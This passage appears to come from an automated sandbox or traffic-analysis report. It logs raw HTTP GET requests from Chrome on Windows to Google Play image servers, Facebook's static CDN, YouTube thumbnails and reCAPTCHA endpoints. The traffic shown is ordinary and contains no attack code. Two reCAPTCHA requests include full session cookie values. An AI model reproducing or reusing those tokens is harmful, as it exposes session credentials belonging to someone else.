    Source: global trafficHTTP traffic detected: GET /y1SAU1g399-DZL0-G3-i0CoT2pQQABM5miEa1C3w2--MxFNh26USlCRt1WGTsmvA6H2v=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i6ht4/yy/l/en_GB/Td5hkdtkXX5.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yJ/r/KO2irUskl3Y.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yi/r/BLqydITNHiz.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iluz4/y2/l/en_GB/MvRHUS1G-cc.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iOos4/yj/l/en_GB/kM7FcjXTwOM.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iH-D4/yD/l/en_GB/kIGqHY8H8ti.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yF/r/G4oeeXLdsEE.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ikJE4/yM/l/en_GB/H9hFVb-Q8_Q.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ievD4/yP/l/en_GB/-F9g11XP17c.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /gUNwuhSI8pm3Bx_rl10RAROBMUVhixQ8Ci4_omoM4ttlN007sZ3ILduAZFboEu8Kzkg=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /y31huOOtAOdrHKqwhl-h_w0UxIvSBfpTJmipcUjaZcc4MXi69pm2ydqvnZWNFZijh5kX=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /EJpSmrjgF0pNb3uY7ITLZ-4gtePSnRB9jXV3r-x_HBTIcm3MZ0s6GZzoPiV7OklNBA=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yW/r/ypejlg-I21y.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /XRDaSYtkE4CmnsfdfgH7CGPmqCDJmeu-h1_J0qwXeHn5yu4NpZWyGRN60yDRYS_wVwg=w240-h480-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /XRDaSYtkE4CmnsfdfgH7CGPmqCDJmeu-h1_J0qwXeHn5yu4NpZWyGRN60yDRYS_wVwg=s48-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /V9eV8_8k5ssFM3cD8eA0oIYP-1mOekwcCFsH5cEWoOLvJ8EmUJYFRkdwg1d-lc1s9Q=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iQbs4/yM/l/en_GB/5Tr2NIWNgxM.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/reload?k=6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AGteOyrzXQW0n3TXU0zP_GS958mVuJNctCaUh7RunfZJLMVNx2rnHj6FC5V0gC1e8VNqWgJL6nGVI2bp_wHwA9o; NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y3/r/Ja35YE72DAb.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yD/r/BGMvuu7HwCF.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yJ/r/KO2irUskl3Y.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /y1SAU1g399-DZL0-G3-i0CoT2pQQABM5miEa1C3w2--MxFNh26USlCRt1WGTsmvA6H2v=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /uQ9hA-fPwMe3U8m0i1lqnLVLKObQWhygMvfHURGy-umOu6EJirFNDqFyiSSLfyb0KA=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /dsl4dYEQ0fnrjbXgqec7Efunr8PBCyraD7WXwOxMQzljHFCUU_wXwLEzyBxKOAanjw=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vi/KHfEG-2pIEI/hqdefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /3Fbi4a9x3z4i_xH8NrC_bSC2m3SPu7Bqj0pW68MHg6AoqCi-pfZLchig4c4DwPA-EGo=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /gKIplvoQADvI0Q7JAS8sikxoB2QYPf4X1R9y7Gmv8epLYDiaqaisAk3qbb4XJY0BVrg=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /c3SRuvi4eb82MzWlnUgy_xyUkCYF8MWFqol3ejyiMR17u1NnI1X0UHFNkLEjCgMT=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i6ht4/yy/l/en_GB/Td5hkdtkXX5.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yF/r/G4oeeXLdsEE.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ivAx4/yo/l/en_GB/48NDuq1PGrS.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iwp84/yz/l/en_GB/yH3NmCM2cz1.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iPiP4/ye/l/en_GB/V4hH0O2u6X-.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/clr?k=6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AGteOyrzXQW0n3TXU0zP_GS958mVuJNctCaUh7RunfZJLMVNx2rnHj6FC5V0gC1e8VNqWgJL6nGVI2bp_wHwA9o; NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
    Source: global trafficHTTP traffic detected: GET /lhOWWzCnzrwdIVTnQp4DyhzTpAFaB17XQIFVhfZcOVDfZzJQKUEV9QmDMbxkiRiqM6Q=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: 